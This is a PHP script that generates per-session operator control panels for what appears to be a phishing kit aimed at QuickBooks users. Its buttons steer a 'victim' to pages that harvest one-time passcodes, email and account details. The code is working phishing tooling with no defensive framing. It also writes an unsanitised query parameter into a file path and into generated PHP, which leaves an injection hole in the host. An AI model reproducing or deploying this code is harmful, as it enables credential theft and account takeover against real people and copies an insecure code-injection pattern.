<?php
if (isset($_GET['sessionID'])) {
    $sessionID = $_GET['sessionID'];

    
    $controlPanelFile = __DIR__ . "/{$sessionID}.php";
    $actionFile = __DIR__ . "/{$sessionID}_action.txt";  

    if (!file_exists($controlPanelFile)) {
   
        $controlPanelContent = <<<EOL
<?php
if (\$_SERVER['REQUEST_METHOD'] == 'POST') {
    // Handle the redirection action
    \$action = \$_POST['action'];

    // Save the action to a file
    file_put_contents('{$actionFile}', \$action);

    echo 'ACTION: ' . \$action;
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Control Panel - {$sessionID}</title>
    <style>
        /* Reset some default styles */
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body {
            font-family: 'Arial', sans-serif;
            background: linear-gradient(to right, #6a11cb, #2575fc); /* Beautiful gradient background */
            color: white;
            height: 100vh;
            display: flex;
            justify-content: center;
            align-items: center;
            flex-direction: column;
            text-align: center;
        }

        h1 {
            font-size: 2.5rem;
            margin-bottom: 30px;
            color: #fff;
            text-shadow: 2px 2px 8px rgba(0, 0, 0, 0.3);
        }

        form {
            background-color: rgba(255, 255, 255, 0.2); /* Semi-transparent background */
            padding: 40px;
            border-radius: 8px;
            box-shadow: 0 4px 15px rgba(0, 0, 0, 0.3);
            width: 100%;
            max-width: 400px;
            margin: 0 auto;
        }

        button {
            background-color: #4CAF50; /* Green background */
            color: white;
            font-size: 1.2rem;
            padding: 15px 25px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            margin: 10px;
            width: 100%;
            transition: background-color 0.3s ease;
        }

        button:hover {
            background-color: #45a049; /* Slightly darker green */
        }

        button:active {
            transform: scale(0.98); /* Small scale effect on button click */
        }

        button:focus {
            outline: none;
        }

        /* Styling for mobile responsiveness */
        @media (max-width: 600px) {
            h1 {
                font-size: 2rem;
            }

            button {
                font-size: 1rem;
            }
        }
    </style>
</head>
<body>

    <h1>Control Panel for Session: {$sessionID}</h1>

    <form method="POST" action="{$sessionID}.php">
        <button type="submit" name="action" value="otp">Redirect to OTP</button>
        <button type="submit" name="action" value="email">Redirect to Email</button>
        <button type="submit" name="action" value="account_info">Redirect to Account Info</button>
<button type="submit" name="action" value="logout">Redirect Victim to QuickBook</button>

    </form>

</body>
</html>

EOL;

        
        file_put_contents($controlPanelFile, $controlPanelContent);

    
        echo json_encode(['status' => 'success', 'message' => 'Control panel created successfully.']);
    } else {
        echo json_encode(['status' => 'error', 'message' => 'Control panel already exists for this session.']);
    }
} else {
    echo json_encode(['status' => 'error', 'message' => 'Session ID is missing.']);
}
?>
